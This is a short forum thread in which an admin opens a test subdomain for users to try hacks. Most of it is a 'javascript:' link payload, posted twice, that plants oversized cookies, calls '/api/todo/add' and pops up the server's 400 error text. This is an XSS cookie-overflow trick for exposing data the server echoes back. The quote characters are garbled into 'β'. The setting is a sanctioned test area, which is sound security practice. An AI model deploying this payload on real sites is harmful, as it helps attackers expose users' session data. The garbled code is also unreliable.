admin
March 27, 2017, 9:29am
1
Hi folks,
You can try your hacks on this sub domain of discuss. It would provide you place to test, and at the same time would help us in keeping the main discussion forum clean.
If you found something, do report at [email protected] . We have laddus for you .
[adsf](javascript: function setCookies (good) {
var str = ββ;
for (var i=0; i< 1819; i++) {
str += βxβ;
}
for (i = 0; i < 10; i++) {
if (good) {
var cookie = βxssβ+i+β=;Expires=Wed,+02+Apr+2025+12:21:55+GMT;path=/;β;
} else {
var cookie = βxssβ+i+β=β+str+β;path=/β;
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText;
alert(content);
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open(βGETβ, β/api/todo/addβ, true);
var params = βpcode=TWEED&ccode=β;
xhr.send(params);
}
makeRequest()
[adsf](javascript: function setCookies (good) {
var str = ββ;
for (var i=0; i< 1819; i++) {
str += βxβ;
}
for (i = 0; i < 10; i++) {
if (good) {
var cookie = βxssβ+i+β=;Expires=Wed,+02+Apr+2025+12:21:55+GMT;path=/;β;
} else {
var cookie = βxssβ+i+β=β+str+β;path=/β;
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText;
alert(content);
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open(βGETβ, β/api/todo/addβ, true);
var params = βpcode=TWEED&ccode=β;
xhr.send(params);
}
makeRequest()